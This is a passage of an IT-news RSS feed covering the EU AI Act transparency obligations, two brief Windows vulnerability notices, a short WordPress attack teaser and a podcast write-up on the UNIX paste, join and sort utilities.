<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199109/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3682511/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682511/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Tue, 21 Jul 2026 03:48:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-35265 | Microsoft Windows up to Server 2019 Perception Service toctou (EUVD-2024-35768)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Microsoft Windows up to Server 2019. Impacted is an unknown function of the component Perception Service. Performing a manipulation results in time-of-check time-of-use.

This vulnerability was named CVE-2024-35265. The attack needs to b...]]></description>
<link>https://tsecurity.de/de/3682478/sicherheitsluecken/cve-2024-35265-microsoft-windows-up-to-server-2019-perception-service-toctou-euvd-2024-35768/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682478/sicherheitsluecken/cve-2024-35265-microsoft-windows-up-to-server-2019-perception-service-toctou-euvd-2024-35768/</guid>
<pubDate>Tue, 21 Jul 2026 03:07:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows up to Server 2019</a>. Impacted is an unknown function of the component <em>Perception Service</em>. Performing a manipulation results in time-of-check time-of-use.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2024-35265">CVE-2024-35265</a>. The attack needs to be approached locally. There is no available exploit.

Applying a patch is the recommended action to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-30095 | Microsoft Windows up to Server 2022 23H2 Routing/Remote Access Service heap-based overflow (EUVD-2024-28032)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Microsoft Windows. Affected by this issue is some unknown functionality of the component Routing/Remote Access Service. The manipulation results in heap-based buffer overflow.

This vulnerability was named CVE-2024-30095. The attack m...]]></description>
<link>https://tsecurity.de/de/3682447/sicherheitsluecken/cve-2024-30095-microsoft-windows-up-to-server-2022-23h2-routingremote-access-service-heap-based-overflow-euvd-2024-28032/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682447/sicherheitsluecken/cve-2024-30095-microsoft-windows-up-to-server-2022-23h2-routingremote-access-service-heap-based-overflow-euvd-2024-28032/</guid>
<pubDate>Tue, 21 Jul 2026 02:39:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a>. Affected by this issue is some unknown functionality of the component <em>Routing/Remote Access Service</em>. The manipulation results in heap-based buffer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2024-30095">CVE-2024-30095</a>. The attack may be performed from remote. There is no available exploit.

It is best practice to apply a patch to resolve this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[New WP2Shell Attack Lets Hackers Take Over Vulnerable WordPress Websites]]></title>
<description><![CDATA[A newly revealed attack against WordPress Core has raised fresh concerns across the cybersecurity community. Researchers showed that attackers can fully take over vulnerable websites without logging into an account first. Researchers named the attack chain WP2Shell. It joins two serious WordPress...]]></description>
<link>https://tsecurity.de/de/3682428/it-security-nachrichten/new-wp2shell-attack-lets-hackers-take-over-vulnerable-wordpress-websites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682428/it-security-nachrichten/new-wp2shell-attack-lets-hackers-take-over-vulnerable-wordpress-websites/</guid>
<pubDate>Tue, 21 Jul 2026 02:20:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly revealed attack against WordPress Core has raised fresh concerns across the cybersecurity community. Researchers showed that attackers can fully take over vulnerable websites without logging into an account first. Researchers named the attack chain WP2Shell. It joins two serious WordPress Core vulnerabilities into one attack. Together, they let remote attackers gain complete control […]</p>
<p>The post <a href="https://privacysavvy.com/news/cybersecurity/wp2shell-attack-wordpress-websites/">New WP2Shell Attack Lets Hackers Take Over Vulnerable WordPress Websites</a> appeared first on <a href="https://privacysavvy.com/">PrivacySavvy</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4687: UNIX Curio #11 - Merging Files]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


ether


This series is dedicated to exploring little-known—and occasionally useful—trinkets lurking in the dusty corners of UNIX-like operating systems.


I frequently find myself reaching for the 
cut
 utility when writing scripts to extract o...]]></description>
<link>https://tsecurity.de/de/3682413/podcasts/hpr4687-unix-curio-11-merging-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682413/podcasts/hpr4687-unix-curio-11-merging-files/</guid>
<pubDate>Tue, 21 Jul 2026 02:03:23 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
ether</p>

<blockquote>
This series is dedicated to exploring little-known—and occasionally useful—trinkets lurking in the dusty corners of UNIX-like operating systems.</blockquote>

<p>
I frequently find myself reaching for the <code>
cut</code>
 utility when writing scripts to extract one piece of data from a line, or to select specific fields from a log file. While I am familiar with its counterpart, <code>
paste</code>
, I don't employ it very often because I don't typically need its functionality.</p>

<p>
This perhaps has to do with the fact that I rarely work with text files containing lists. For shorter lists, I usually end up using a spreadsheet and for larger ones, a relational database. Both are valuable tools with their own strengths and weaknesses, but it is good to also know about standard utilities for working with lists. After uploading UNIX Curio #8 (<a href="https://hackerpublicradio.org/eps/hpr4657/" rel="noopener noreferrer" target="_blank">
HPR episode 4657</a>
), I felt like maybe I had been too dismissive of the <code>
comm</code>
 utility in that episode and should talk more about tools that are useful when managing lists.</p>

<p>
I don't frequently find myself using <code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/paste.html" rel="noopener noreferrer" target="_blank">
paste</a>

</code>

<sup>
1</sup>
, but can explain how it works. Briefly, it is a rough opposite of <code>
cut</code>
—when given multiple files as arguments, it assembles the first line from each one separated by tabs, then the second line, and so on. Instead of tabs, a different delimiter can be chosen with the <code>
-d</code>
 option. Another option is <code>
-s</code>
, which swaps rows and columns so that the contents of each named file would appear on one line. While <code>
paste</code>
 itself doesn't qualify as a UNIX Curio in my opinion, there is one feature that does: a hyphen can be given as an argument multiple times. In this special case, the output is taken line by line from standard input, but is spread across as many columns as there are hyphens.</p>

<p>

<em>
Example of using </em>

<code>

<em>
paste</em>

</code>

<em>
 to turn the output of </em>

<code>

<em>
ls</em>

</code>

<em>
 into columns. Because these columns are separated by tabs, they don't necessarily line up when a filename is eight or more characters long. The </em>

<code>

<em>
-1</em>

</code>

<em>
 is not required for the second </em>

<code>

<em>
ls</em>

</code>

<em>
 command since that behavior is implied when output isn't going to a terminal. The </em>

<code>

<em>
-C</em>

</code>

<em>
 option to </em>

<code>

<em>
ls</em>

</code>

<em>
 usually gives nicer-looking output on a terminal—also, it lists in ascending order down by column. (Most implementations default to </em>

<code>

<em>
-C</em>

</code>

<em>
 when output goes to a terminal.) If you want items ascending along rows like the </em>

<code>

<em>
paste</em>

</code>

<em>
 example does, try </em>

<code>

<em>
ls -x</em>

</code>

<em>
 instead.</em>

</p>

<pre data-language="plain">
$ ls -1 /proc/net
anycast6
arp
bnep
connector
dev
dev_mcast
dev_snmp6
fib_trie
fib_triestat
hci
icmp
icmp6
if_inet6
igmp
igmp6
ip6_flowlabel
ip6_mr_cache
ip6_mr_vif
ip_mr_cache
ip_mr_vif
ip_tables_matches
ip_tables_names
[...35 more entries not shown...]
$ ls /proc/net | paste - - - -
anycast6        arp     bnep    connector
dev     dev_mcast       dev_snmp6       fib_trie
fib_triestat    hci     icmp    icmp6
if_inet6        igmp    igmp6   ip6_flowlabel
ip6_mr_cache    ip6_mr_vif      ip_mr_cache     ip_mr_vif
ip_tables_matches       ip_tables_names ip_tables_targets       ipv6_route
l2cap   mcfilter        mcfilter6       netfilter
netlink netstat packet  protocols
psched  ptype   raw     raw6
rfcomm  route   rt6_stats       rt_acct
rt_cache        sco     snmp    snmp6
sockstat        sockstat6       softnet_stat    stat
tcp     tcp6    udp     udp6
udplite udplite6        unix    wireless
xfrm_stat
$ ls -C /proc/net
anycast6      if_inet6           l2cap      rfcomm        tcp
arp           igmp               mcfilter   route         tcp6
bnep          igmp6              mcfilter6  rt6_stats     udp
connector     ip6_flowlabel      netfilter  rt_acct       udp6
dev           ip6_mr_cache       netlink    rt_cache      udplite
dev_mcast     ip6_mr_vif         netstat    sco           udplite6
dev_snmp6     ip_mr_cache        packet     snmp          unix
fib_trie      ip_mr_vif          protocols  snmp6         wireless
fib_triestat  ip_tables_matches  psched     sockstat      xfrm_stat
hci           ip_tables_names    ptype      sockstat6
icmp          ip_tables_targets  raw        softnet_stat
icmp6         ipv6_route         raw6       stat
$ ls -x /proc/net
anycast6           arp              bnep               connector     dev
dev_mcast          dev_snmp6        fib_trie           fib_triestat  hci
icmp               icmp6            if_inet6           igmp          igmp6
ip6_flowlabel      ip6_mr_cache     ip6_mr_vif         ip_mr_cache   ip_mr_vif
ip_tables_matches  ip_tables_names  ip_tables_targets  ipv6_route    l2cap
mcfilter           mcfilter6        netfilter          netlink       netstat
packet             protocols        psched             ptype         raw
raw6               rfcomm           route              rt6_stats     rt_acct
rt_cache           sco              snmp               snmp6         sockstat
sockstat6          softnet_stat     stat               tcp           tcp6
udp                udp6             udplite            udplite6      unix
wireless           xfrm_stat
</pre>

<p>
The <code>
paste</code>
 command has limitations—the files you give it must all be already arranged in the same order, and if any file is missing a value, it must have a blank line so that subsequent lines will match up correctly. The files do <em>
not</em>
 necessarily have to be sorted alphabetically, but whatever order they are in has to be the same. Check out HPR episodes <a href="https://hackerpublicradio.org/eps/hpr0962/" rel="noopener noreferrer" target="_blank">
962</a>
 and <a href="https://hackerpublicradio.org/eps/hpr4201/" rel="noopener noreferrer" target="_blank">
4201</a>
 for some more background on the <code>
paste</code>
 utility.</p>

<p>

<em>
Example of using </em>

<code>

<em>
paste</em>

</code>

<em>
 with files where some values are empty. Bob works from home so doesn't have an office assigned, and the laboratory Carol works in doesn't have a phone. This relies on the fact that the same line number in every file relates to the same person/entry.</em>

</p>

<pre data-language="plain">
$ cat names
Alice
Bob
Carol
Dave
$ cat offices
203

Lab6A
117
$ cat phones
+1 212-555-1234
+1 919-555-2345

+1 212-555-1278
$ paste names offices phones
Alice   203     +1 212-555-1234
Bob             +1 919-555-2345
Carol   Lab6A
Dave    117     +1 212-555-1278
</pre>

<p>
Our second UNIX Curio for today is <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/join.html" rel="noopener noreferrer" target="_blank">
a utility called </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/join.html" rel="noopener noreferrer" target="_blank">
join</a>

</code>

<sup>
2</sup>
, which has a bit more sophistication. It operates on two files, which can have multiple columns, and combines them using the join field. By default, the first column/field in each file is the join field, and only entries that exist in both files are printed. The <code>
-1</code>
 and <code>
-2</code>
 options can be used to join on a different field, and <code>
-o</code>
 selects specific fields to be output. To make it so lines with missing entries also appear, you need to use the <code>
-a</code>
 option, but an actual empty string with separator won't be printed unless <code>
-o</code>
 is also present and includes the field.</p>

<p>
The default field separator character is one or more "blanks" in the current locale—for the POSIX locale, this means a space or a horizontal tab. The <code>
-t</code>
 option selects a different character and also removes the treatment of multiple occurrences as a single separator, making it possible to have an empty field in one or both of the files. By default, a single space is used to separate fields in the output. If <code>
-t</code>
 is given, the same character is used for separating fields in both input and output. You would need to pipe output through another tool like <code>
tr</code>
 if you wanted to have a different separator in the output.</p>

<p>
The <code>
join</code>
 utility might be an improvement over <code>
paste</code>
 in some cases, since the join field makes it a little easier to identify which entries match up across files. It is limited to operating only on two files (one of which can be standard input), so combining more than that requires either creating temporary intermediate files or chaining together <code>
join</code>
 commands in a pipeline. Another requirement is that all files must already be sorted in the current locale.</p>

<p>

<em>
Example showing how </em>

<code>

<em>
join</em>

</code>

<em>
 can be used with two tab-separated lists. The LC_ALL assignment forces </em>

<code>

<em>
join</em>

</code>

<em>
 to sort using the C (POSIX) locale instead of whatever might be set in your environment. The "@" on the header line has no special meaning; it is just there to make sure it sorts before any letters or numbers (in the C locale; it might not in other locales). Note that if </em>

<code>

<em>
-t</em>

</code>

<em>
 were not specified, </em>
plist<em>
 would be treated as having three fields because of the space separating the country code from the rest of the phone number.</em>

</p>

<pre data-language="plain">
$ export tab="$(printf '\t')" #To more easily use tab characters below
$ cat olist
@Name   Office
Alice   203
Carol   Lab6A
Dave    117
$ cat plist
@Name   Phone
Alice   +1 212-555-1234
Bob     +1 919-555-2345
Dave    +1 212-555-1278
$ LC_ALL=C join -t "$tab" olist plist
@Name   Office  Phone
Alice   203     +1 212-555-1234
Dave    117     +1 212-555-1278
$ LC_ALL=C join -t "$tab" -a 1 -a 2 olist plist
@Name   Office  Phone
Alice   203     +1 212-555-1234
Bob     +1 919-555-2345
Carol   Lab6A
Dave    117     +1 212-555-1278
$ #By default, join acts as if empty fields don't exist; use -o to include
$ LC_ALL=C join -t "$tab" -a 1 -a 2 -o 0,1.2,2.2 olist plist
@Name   Office  Phone
Alice   203     +1 212-555-1234
Bob             +1 919-555-2345
Carol   Lab6A
Dave    117     +1 212-555-1278
$ #The -e option sets a placeholder to use for empty fields
$ LC_ALL=C join -t "$tab" -e "(none)" -a 1 -a 2 -o 0,1.2,2.2 olist plist
@Name   Office  Phone
Alice   203     +1 212-555-1234
Bob     (none)  +1 919-555-2345
Carol   Lab6A   (none)
Dave    117     +1 212-555-1278
</pre>

<p>
The brief description for <code>
join</code>
 is "relational database operator"—I won't dispute that, but in my view it offers far fewer capabilities than people would expect from today's relational databases. I would imagine that when most people think of those they have Structured Query Language (SQL) in mind, which offers a lot more flexibility and functions to operate on data. However, I can see how <code>
join</code>
 could be suitable for simple operations.</p>

<p>
Our last UNIX Curio for today relates to <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sort.html" rel="noopener noreferrer" target="_blank">
the </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sort.html" rel="noopener noreferrer" target="_blank">
sort</a>

</code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sort.html" rel="noopener noreferrer" target="_blank">
 utility</a>

<sup>
3</sup>
. While, as you might expect, it is well-known for its ability to sort data, it has another feature that is more obscure. When used with the <code>
-m</code>
 option, instead of sorting the files given as arguments, it merges them together. All of the files are expected to already be sorted—once combined, the list that is output will also be sorted. The order in which the files are named does <em>
not</em>
 matter; it is not required for the contents of the first file to start before the second, just that both are sorted.</p>

<pre data-language="plain">
$ cat women
Alice
Carol
$ cat men
Bob
Dave
$ sort -m men women
Alice
Bob
Carol
Dave
</pre>

<p>
Imagine that you organize an annual event and have a separate pre-sorted list of attendees' e-mail addresses for each of the past three years. You are planning this year's event and want to send out an announcement to all of these people, as they will probably be interested. The command <code>
sort -m -u 2023list 2024list 2025list</code>
 would spit out a combined list that you can use for your e-mail blast. Because it is likely that some people would have attended in more than one year, I included the <code>
-u</code>
 option—it removes any duplicate entries.</p>

<p>
It is probably no surprise that the <code>
sort</code>
 utility appeared early on—it was in 1971's First Edition UNIX, though it didn't <a href="https://archive.org/details/a_research_unix_reader/page/n19/mode/1up" rel="noopener noreferrer" target="_blank">
gain the merging functionality until Fifth Edition</a>

<sup>
4</sup>
 in 1973. What <em>
did</em>
 come as a shock to me is that both <code>
cut</code>
 and <code>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=SysIII/usr/src/man/man1/paste.1" rel="noopener noreferrer" target="_blank">
paste</a>

</code>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=SysIII/usr/src/man/man1/paste.1" rel="noopener noreferrer" target="_blank">
 didn't show up until 1980 with System III</a>

<sup>
5</sup>
, and were actually preceded by <code>

<a href="https://man.cat-v.org/unix_7th/1/join" rel="noopener noreferrer" target="_blank">
join</a>

</code>

<a href="https://man.cat-v.org/unix_7th/1/join" rel="noopener noreferrer" target="_blank">
, which was in Seventh Edition UNIX</a>

<sup>
6</sup>
 from 1979. I assumed that at least <code>
cut</code>
 would have been around far earlier, given its usefulness and how firmly established it is, but I suppose it just <em>
seems</em>
 to have been with us forever.</p>

<p>
As mentioned, I don't typically manage data as text files containing lists, and I probably won't start using the <code>
join</code>
 utility or these features of <code>
paste</code>
 and <code>
sort</code>
